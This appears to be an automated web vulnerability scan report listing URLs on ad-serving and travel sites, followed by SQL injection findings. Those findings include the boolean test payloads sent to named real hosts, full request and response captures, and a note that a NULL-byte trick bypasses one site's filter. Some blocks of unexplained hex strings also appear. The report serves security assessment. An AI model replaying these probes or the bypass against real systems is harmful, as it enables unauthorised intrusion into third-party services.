53a16139211b0cb556cd69fb48a1dcba5d60771222daaf009b778966d228b012178fdd609edcf90d5924bf310972473f54a1ffc20583ba6b3c76a1733f00ac936579c56bdb60da65a9ef207789fc91bb93a6ca847c3b11dee47cf4582777ca82607b566da1ccb2577e7ff60f75eeb51d8656a6b645d99f3c6ead5327d90edb68d8e9ff88afbe1146d49e4ce9dc38c05471a854c68478d038a5b022672d555ce40ada2b5ad02e6380f00e53b7603302fc6375e60652af6ee7c7f9733204e3717403e0196c249c4cea1b479e5537d8a22e039104d2d3cbcb2ba35565e471fb92980b396aa148d4d55cfdb2344aa46c14907ae71fac1059caa22f88cb5610a1b30e974a7a71d2e3e002299986f1f1d8463caf5a530f393a3fc5a8866ff455326077ad9c3410e595256efb41a1d5a83b0801c5841eee0e1418a5ce41416d89bb7cfe1310a2c13b91d927d592168f95eb77fc9d4ae95593766a20e9843d6d2ffa2d61a7e41725babc745d8400eeeafd00dbbc4e265d8e1a68a095618f24d537f69227a5c75e0068177a7009b4c1f6a659f25ce2544c00c45df23724c3ce75728995b1c5f808a9006f510d6f449f5b7d5faae280ba17fa7d8ac24d2223304dcad0e4c9c66065ce714112788a741f5ffe4ac4ccb543a06d416509a2594d0a9c5aac62639b1e2461dcbc0
23d4f94ec670a4d90a393d281eee7ac1a7a6d12abc7a3f36121634921c13481c87cdc5e3686328d4c84357836d17b2d9d378343b8120704ef2f68797a71475c58673cb80d0776b2a028abc59e54fdc29c1a84af3f644c147abf2c1f2d454a330a0c3c489d958b4cb79bb3eb21ec1da3a76b519e28710c34cba3da7bf10e5b263108fb57711b6771ccfaa872df7109e44d9474019da921e85684f46b420d62184a4c2d59def5c85060d23bd3877af6ccfe11a507a7e7bdd1d3bc9a4f84c33b9139ec9e7d91cc36e42f0b9df9ade25fb8a7e26304ec1d62979c0329521127e7621277e081406186f6c361c9e1ff0fd840c78037c6205b105160f4a2fc9ac41294ac9bda016e9f630dede55b8a8ac0407857d2f18f2022f5bfb0f1094c1b56477849fa2acea99f60fe8023330d7

28.55. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.56. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.57. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.58. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.59. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.60. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.61. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.62. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.63. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.64. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.65. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91f4bce4a535901afd613eb60454f94b522ae5a0f92f493ea819c172569003b3b509f70f9aa24b28c9cf18bd706efe47c3f107ad579e17c40820ea7d59a73ecc0eda6324f0e772cd4dac1acc2f3c2c715f94f6c6b2c43b6d93e0b9de8bcdf8dfa4b5163d49b4cecec1895d4011d61c3d1d8301890b0122218051c14dfda0b1fa50b53a5c57e46e2206617f97330e60312ff4b22c719037281a32451b6c03c6c349c599a4e47ae3017e8a76e43e41167a6fe9b7be30030f4013e12cd9e395ad1bdc1d009a8a2413fa43c24609a524fd930fc9a171fed4e5610d4234e974a0fd4e2c6c04779992691c4b8b62cdf3fa2bed81c19933ff0285010f665f2dccd90735341116e1b45d141b87ac89150a13e6b1e44b8456ac111cddceba90ec6f572f05b14f902e092134a551b7659984fd9b0d3e6ff8549e55d2c4f1acab1a7c41315ae693139b015aeda9d916bccefe268c87ae8370104ab216424f6b05635a27e865f23ba918e6765327398632c66210880e14d920714634ee0e278e5c575e979ed70fa30591e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804039621c3d0fd96fec5706fb0ea1a49c195
23d6a84f9321f3d900393f7d41e52995adf5d52fe17039304c456396481d1e49dace94e56a6027d2c0195ad86e47e588d47e3f37d227744aa3a98790ad4024c38176c6d2d2766f2a5081ba0ae048df7dc2f816f6a519c715ffa290f98202a531a1c6c28d8f4eaddf44fb79f8409c8b6763b513b3804dd447fe3ff1ba45e3b16244d2ef7115e3271dc0fc857ca002d000ef252a67b2e658db2c1312f56fc51abde481809fae009f051222bc3f75f269c9e10f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e3d4bd8856960db4fb7291b054e9cd9

28.66. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.67. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.68. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.69. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.70. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.71. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.72. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fca292890d6cd87536c914b721f181414af3343fe0e138920aa65419774524be075b2b5f1b2ab1843066aece8f71bddba05ab23869f2955d227d572dab9ed5efa167bc2bca8e25175f55d8517e1334f21288737072c7d27637d16f854c0dd280fa75c5005264714eabeb75412061049f5d29109a198147ec69f9b9f16cd432dbab74fa42fd1960054baf005cfc3345776ae2b78b506d2cf4ee9305215f3c36ab8d804343c9f17c24d6eec92d5a4068d44f3d6279640d681363e30e10dcb959a7fae6a40cb8c5c464066a6609612e1ca6d7cbebb13dacd2ed9055d5fa282c9392f2b0059e61cc683da74b2574cfa23bac627512bab396e0ec31846f4870c6b1fbb2aa9415784daeb8b66c15ffadddd07aeb250f9460b6b057407ef01cffd2193a454c3b83fa845fc98ded6bef457c93bc17ecaa9069b0e82f4e8a17e214d9cc28208446593ebc1ceef705486376b84c3971b165140960058f31a24ebdd78dda40e1df4d33cb0a0e25895c8df49c4854bbb5c1435a5a6373611b67fd5ed4455456dfe5e061dc59eef4191141e0d0cebbbbb4cb781b92e7e8616fb483130032b2512378536e0c258ba2bc76a069b759c8c4ea58f9b5ac759a529801d7ba7eda93afe0ddabb50284d0f2dd2330e40235b893f0fdbdc19c91fed6c3b901ef11a4e147b7d807d2f22b5c5ed60ec2985a5eec30af349443453a8158905daaa4ab3ef284cba238d2b33eddc4838376817bec49561a8484b5e5486b69e61b6d77380006cb4f07b4abc0e97049d0da6d59f2b8d1abaf88ef36907fd525691579327f18efee02836a77f4df2e3be17598d3b2e778029bba743ee8ccd845ea6294f06e2decf38abc4ebd95b95c510c7161faabbad762f454429e9f43927ce5a51f3771c7da9144261adc801782c234a62e741a2649cf5409d6a52
28dd012b0f5fb3ea5a14d8b11bfa76748fc9f8331643549233dc7357c4975f7e97c004bd9e5dcc60318d2b38ade449d6cd0bc0da163ca2e2c4297f6152d0aa548b27d987e3d839ab944c7f560e8e4b0e52bf46302a88e7cdea9f0e86a7b4c0a01e32ab8b90482efe55db125a2ff53fdd80c39a4807bd9d1e13e56e2da4058f0ffb9d7d0d21e8f86286b288f55fa6e898222c74dd91f19e8bb4e607fd2a4bc0e3c538383c327191ca03e7849185da7384812fda77ed78a439991ce205c96df42fd8c9cc937c5383f7250ca2061e1f47daf3fa197aa139df9f6e4efa9e59d75be2c49820728fa1f9c7ef5bb6cc9e0e218461a09d818da52d4bb27dcbf682b79452c84d2c97a61e3989ef5a27a040eceed8b1e79127130111b637e59e539ee9b1314215045bc86f7123a277006a15b4

28.73. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242f06ec4338f0c9609ed6286853138dbcf4b992a457f09522bedec119d956e043c6b5402b520bf74799c4cc7352300b03ec55280aee97c70eadf262fc27cbb7d1dc35c2e78397fd23e977853c5a3d30e2a3a2ed6b5bf1d1ebe14630a4b801ce334f0d6b7e654b582da1ce5b34bff1ee3a54c9f54797c5759ea6685618f272e01ec89ac279236b644448ae5e9470856b0eed63ab489a93ed746c3c0b9cccd150198cac82b4a05f4998f7dce37bbdf017ad4a4ee52a53e63863fca84f824e07d3d0be3ff88889026995f5e1087634ee46e4fedb02527ba58bd7f9d2ce466b0b7cbcf63ecba56f9f81b18b5d0859f49278b4c775444697be06e2b9b565cc04d93745fad54191ca808e5e5b2e7ef0a49077aaaaa8b448ea80ff467d08836009661c7768fadf41dd83148f0919ac17152cc65b25fba3f11362bd56a5f6d6930237f44a642d59f380be709504679151cbde6f81f414d5612b99bda4efab25f269df3baac129f6d64eaa245b933c89f2c31d2c578cbc2385011b00c499227f7f377b927155dce8337fa811f6c2d831fc7113df4c487a6028e45f7d275955a8488303624f90d82ded93fae2d188aa6373b0b6287708146a89a4553a79039e9a14baf71203aa0ec8b757b6c5a0d8a5a83c49b1cf7011aae39b6ca275b2ea43a6203cc1644f4870b6f1bbb3da0495f82d6f68b398a66d7eecc1eaff848e155512b5e2015ed12a39363d2f00cd9ba2bbb47eff6b092f2ac07d836d061d9b615f364ceb9bde36a355e9edd840e4c6b9eeaced8e6754b802c63938edb405b1310980e25fb3b0fc0ef19c5bc1d5aa1c06ffced00877b9c

28.74. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.75. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.76. http://showadsak.pubmatic.com/AdServer/AdServerServlet

28.77. http://sr2.liveperson.net/hcp/html/mTag.js

28.78. http://survey.122.2o7.net/survey/dynamic/suites/332/hotelsallprod/list.js

28.79. http://uxm.thousandeyes.com/rest/json

28.80. http://www.agoda.com/js/MainTextSearch.js

28.81. http://www.agoda.com/pages/agoda/default/page_traffic.aspx

28.82. http://www.agoda.com/pages/agoda/test/rendertime_techno.aspx

28.83. http://www.burstnet.com/cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/

28.84. http://www.cheaptickets.com/cacheable/empty.html

28.85. http://www.facebook.com/extern/login_status.php

28.86. http://www.getaroom.com/browse/market_deals

28.87. http://www.hotels.com/hoteldetails/urgencypopup.html

28.88. http://www.hotels.com/selectors/en_US/

28.89. http://www.hublot.com/favicon.ico

28.90. http://www.inadcoads.com/script.ashx

28.91. http://www.manutd.com/styles/greybox/gb_scripts.js

28.92. http://www.nike.com/nikefootball/global/xml/style.xml

28.93. http://www.nike.com/nikefootball/home/socialfeeds

28.94. http://www.nike.com/nikefootball/home/twitterfeed

28.95. http://www.nike.com/nikeos/global/modules/nav/xml/country/country_lockup_config_US.xml

28.96. http://www.nike.com/nikeos/global/modules/nav/xml/language/lockup_expand_translate.xml

28.97. http://www.orbitz.com/cacheable/empty.html

28.98. http://www.revresda.com/favicon.ico

28.99. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=225&rotator=true&width=519&adType=script&

28.100. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317601998697&height=225&rotator=true&width=519&adType=script&

28.101. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602110931&height=225&rotator=true&width=519&adType=script&

28.102. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

28.103. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

28.104. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

28.105. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

28.106. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

28.107. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

28.108. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

28.109. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

28.110. http://www.sabrehospitality.com/favicon.ico

28.111. http://www.sabrehospitality.com/images/masthead/int-masthead-distribution.jpg

28.112. http://www.sabretravelnetwork.com/favicon.ico

28.113. http://www.tnetnoc.com/siteImages/ORB/banners/hotel/details/telesales/ORB_Telesales_HotelDetails-2.png

28.114. http://www.tripadvisor.com/HotelCheckRates

28.115. http://www.tripadvisor.com/api/ratinginfo/1.0/getRating

28.116. http://www.turkishairlines.com/data/gateway.aspx

28.117. http://www.turkishairlines.com/data/promotion.aspx

28.118. http://www.turkishairlines.com/en-CA/quicksearch.aspx

28.119. http://www9.effectivemeasure.net/v4/em_js

29. Content type is not specified

29.1. http://ad.technoratimedia.com/st

29.2. http://ad.yieldmanager.com/st

29.3. http://orbitz.tt.omtrdc.net/m2/orbitz/mbox/standard

29.4. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/sc/standard

29.5. http://pcm1.map.pulsemgr.com/uds/pc

29.6. http://www.aon.com/manchesterunited/fougrdbd-webfont.ttf

29.7. http://www.aon.com/manchesterunited/vagroundedstd-light-webfont.ttf

29.8. http://www.expedia.com/static/default/default/eta/commonIcons.gif

29.9. http://www.expedia.com/static/default/default/html/calendar/v2.0.0/calendar.html

29.10. http://www.expedia.com/static/default/default/images/bubble_left_onblue.gif

29.11. http://www.expedia.com/static/default/default/images/bubble_right_onblue.gif

29.12. http://www.expedia.com/static/default/default/images/eta/sp_logo.gif

29.13. http://www.expedia.com/static/default/default/images/eta/stampa.gif

29.14. http://www.expedia.com/static/default/default/images/hotel-sprite.gif

29.15. http://www.expedia.com/static/default/default/images/infosite/bg_button_b.gif

29.16. http://www.expedia.com/static/default/default/images/infosite/bg_button_span_b.gif

29.17. http://www.expedia.com/static/default/default/images/infosite/button_beak_b.gif

29.18. http://www.expedia.com/static/default/default/images/infosite/hotel_detail_rating_bar.gif

29.19. http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_down.gif

29.20. http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_up.gif

29.21. http://www.expedia.com/static/default/default/images/infosite/rating_bar.gif

29.22. http://www.expedia.com/static/default/default/images/infosite/rooms_left_middle.gif

29.23. http://www.expedia.com/static/default/default/images/infosite/videoPlayLarge.gif

29.24. http://www.expedia.com/static/default/default/stubs/adserver.json

29.25. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png

29.26. http://www.expedia.com/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png

29.27. http://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png

29.28. http://www.expedia.com/static/fusion/v2.3/images/progressAnim.gif

29.29. https://www.expedia.com/static/default/default/eta/commonIcons.gif

29.30. https://www.expedia.com/static/default/default/images/bpg/BPG_logo_US.gif

29.31. https://www.expedia.com/static/default/default/images/creditcard.gif

29.32. https://www.expedia.com/static/default/default/images/popup_bottom_notch.gif

29.33. https://www.expedia.com/static/default/default/images/progressbar.gif

29.34. https://www.expedia.com/static/default/default/stubs/adserver.json

29.35. https://www.expedia.com/static/fusion/v2.3/images/buttonBG.png

29.36. https://www.expedia.com/static/fusion/v2.3/images/buttonBGtransparent.png

29.37. https://www.expedia.com/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png

29.38. https://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png

29.39. http://www.orbitz.com/App/SubmitQuickSearch

30. SSL certificate

30.1. https://secure.mlb.com/

30.2. https://www.expedia.com/



1. SQL injection
There are 24 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.yieldmanager.com/imp [atf parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The atf parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the atf parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /imp?Z=300x250&atf=1'%20and%201%3d1--%20&brw=cr3&efo=0&os=wn7&pfm=1&prm=0&rtg=ga&s=1782250&tlfs=ch&tmen=ch&tphv=ch&uatRandNo=65268&_salt=4187966827&B=10&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response 1

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:37 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0134.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:53:37 GMT
Pragma: no-cache
Content-Length: 1800
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<script type=\'text/javascript\' src=\'http://ad.turn.com/server/ads.js?pub=5757440&cch=5766809&code=5766822&l=300x250&aid=27255150&ahcid=2583630&bimpd=lw-vFKdVdt5jymyFqiJARROI2dRcPU5t9ZR1nw7zLfGyYRMnE5CBXotWai1zkkh5aQyuKezoNUrOWJ5OOejNY_hJQY3n5aB8LYFmoY1scYnkOuPr29GBwJEIlGIG8y6-woDPCiqPiV08NCy4UXORWW1HcKcIB-ji-YZznvV7YFbW-jz71YgLww7DGj5OXU14DGxlqQmkrMO95frYlC-2EecdQoEWgIftwRBNTCUIHlnIX2X-btI9IF1hQqZV-fS_9r7SRIRbOFhwT4uGv7bxlxoogu7v0QCZlqoLiKSE0YoB1I82nS-1Az844z0LvrxUVFSFAqZZv9Y6DfnxcXgN-CLsKli7c3srR59_w2uApkZ4zOGxFlgqKMqOcLjGPeXuw9rtxn9I-6VbCSFXDmUXUF3DL4c-PvPhKwaZQZOxh4y_pKLDOLgieGxoRV6uf0r3GnNxk5QAcyrq8hS2PQWsGSRN6cjv64iyAUwjrCV62Z4kNWUS9C6pnmY7wyLcrDnGRpqH141eggasYFFNO0SQRhrB2q8vsB_pWw7eofVu65DMN8BETOKrAOkHaet0vXqwvfBz5xDsVEqchMpjM7fNhSIgs650GHZdIqJT1wU-IA6y0RdukcSHg45VLcxfHZDyvzvm_C2gw3LCUGFlwKflrjU51HHY789nG4erhkB4WPijkriCu4UjPOsP76C358RxZLtOEV4-KNgW6xYUbQ9gzQ8BL-KZxXJBiWKRPNmIYZxasgEkMt3v87EW0sfEZwqdLK1EaGuwAlEPUKyOoDOQbdT_c9SK2zNgw7l2BpfGmhKXO_wudIg0fd7Kg-WDT38ZQTxw0DEqZsZHYOIht_MLky730X_TxHXAuaaB6eh8srs&sli=3154796&bli=2900475&exPub=425670&acp=0.0150&3c=http%3A%2F%2Fad%2Etechnoratimedia%2Ecom%2Fclk%3F3%2CeAGVT8tugzAQ%2EBpuyMJ2eAn14MQhosJJaVHSckEGGxHxrEMFytfXamjvXa20o9mdWQ3EAa6k9IXAG15C7rpVADEqXUtyiCvTCoIAIs%2EHeIMc8xZtBTkNy2GmXh8l5KeoA38hIdQjSfTgXzwCZgqAnb3HD4YUOzavIjd5W%2DG6%2D9%2DgfvW6XyX632qFPslpuUfbP6%2EDc5tdmM1Q2MaXc3NM9xNLw5btLPsjTaw4LTdZKhqWnjvWHZtsjaT1T6ZZT9NoYGKgULcAk%2DJCLmAYZb%2DAcug0ySsFxlofhfehl1dhYOpgHxrIKQuNr%2E1NqilXvBdDl%2EdfXSFVXkslvwHt2G1w%2C&url=http%3A%2F%2Fd%2Etradex%2Eopenx%2Ecom%2Fafr%2Ephp%3Fzoneid%3D6391%26cb%3Dinsert%5Frandom%5Fnumber%5Fhere\'></script>');
var rm_data = new Object();
rm_data.creative_id = 8690940;
rm_data.offer_type = 3;
rm_data.entity_id = 424978;
if (window.rm_crex_data) {rm_crex_data.push(8690940);}

Request 2

GET /imp?Z=300x250&atf=1'%20and%201%3d2--%20&brw=cr3&efo=0&os=wn7&pfm=1&prm=0&rtg=ga&s=1782250&tlfs=ch&tmen=ch&tphv=ch&uatRandNo=65268&_salt=4187966827&B=10&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response 2

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:38 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0328.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:53:38 GMT
Pragma: no-cache
Content-Length: 1814
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<script type=\'text/javascript\' src=\'http://ad.turn.com/server/ads.js?pub=5757440&cch=5766809&code=5766822&l=300x250&aid=26676525&ahcid=1883426&bimpd=fOK9nK5SBPNMFPSaVcmC2Wth1-bS6WqeAcIEhmtqe7rT8nINU3UZBQr9rcUhUA1N8cRt7-4qdvT1s921wLY5MvhJQY3n5aB8LYFmoY1scYnkOuPr29GBwJEIlGIG8y6-woDPCiqPiV08NCy4UXORWW1HcKcIB-ji-YZznvV7YFbW-jz71YgLww7DGj5OXU14HnxF-CcwsJXwWAOdYeKznq8McqEAK-UmBlv3IIWyyUO3ZdHjZdUsAV-ly2h2S3imgukhFY036-UAkYbmGxOKupGFftJkIqwH9qF07DFDjClZLvv9Fj99WkgUM3N7Pk3wJLXqTBYYrDYXzyLBoFAQjyLsKli7c3srR59_w2uApkZ4zOGxFlgqKMqOcLjGPeXul1BZwhrGK9kkKqWo_4Vc0HttRxMG_MxGL8BOWn5BaTgxnIpfRe_0nV8j-2uLFEcHGnNxk5QAcyrq8hS2PQWsGSRN6cjv64iyAUwjrCV62Z4kNWUS9C6pnmY7wyLcrDnG_9FK7pAJgs0CD0PsBjgu6xrB2q8vsB_pWw7eofVu65DMN8BETOKrAOkHaet0vXqwvfBz5xDsVEqchMpjM7fNhX3cv0bkaM0JpYmODU6vGPfofQ9TH1f1BuQDNWHQYeRUvzvm_C2gw3LCUGFlwKflrjU51HHY789nG4erhkB4WPhneywnUNb5R3ghoDZMAUmq5ZT6ApQ0N3A9ksY0B-eLzmL0jJk7x81x1HM4Bl65LQheFkuieZwAC6g7llKdWa2iLK1EaGuwAlEPUKyOoDOQbdT_c9SK2zNgw7l2BpfGmhLu_A45Cp_byU6Eng9JHpJukR3NLoNbrFznL6rSwUDyDC730X_TxHXAuaaB6eh8srs&sli=3154796&bli=2900475&exPub=425670&acp=0.0088&3c=http%3A%2F%2Fad%2Etechnoratimedia%2Ecom%2Fclk%3F3%2CeAGVTstugzAQ%2EBpuyAKbp1APTgwREY%2EQorbhgsA2IiU85FAF8fW1GtqeO1ppR7M7s6sjz9JhI0G5SRG1a%2DjpCFJb45VBXVXzPA%2DatmEgzXVt9RbuGE7H5XAnzhBm%2DBvE0n8oxsTBWfjQTw4GdwKAWbxHDwXX%2D%2Ei%2DmezsZaPb7H%2DNuM2zv1nkvS3qZGXpsoa736zDsU9Wfy0%2Dimv09toluT%2EHeXCN95qZkGMX5dQoctbF%2DXlJJT%2E%2EvfSkqu08TwrCCgxkMTCLivEFjBMfFkDHXopVI8DUyqVgHQd%2DYQoiFnJ1BVq0lvwy3LiYS1ENbOzL4bOvuShbLvgXrFBuYw%3D%3D%2C&url=http%3A%2F%2Fd%2Etradex%2Eopenx%2Ecom%2Fafr%2Ephp%3Fzoneid%3D6391%26cb%3Dinsert%5Frandom%5Fnumber%5Fhere\'></script>');
var rm_data = new Object();
rm_data.creative_id = 8690940;
rm_data.offer_type = 3;
rm_data.entity_id = 424978;
if (window.rm_crex_data) {rm_crex_data.push(8690940);}

1.2. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH [JEB2 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH

Issue detail

The JEB2 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JEB2 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

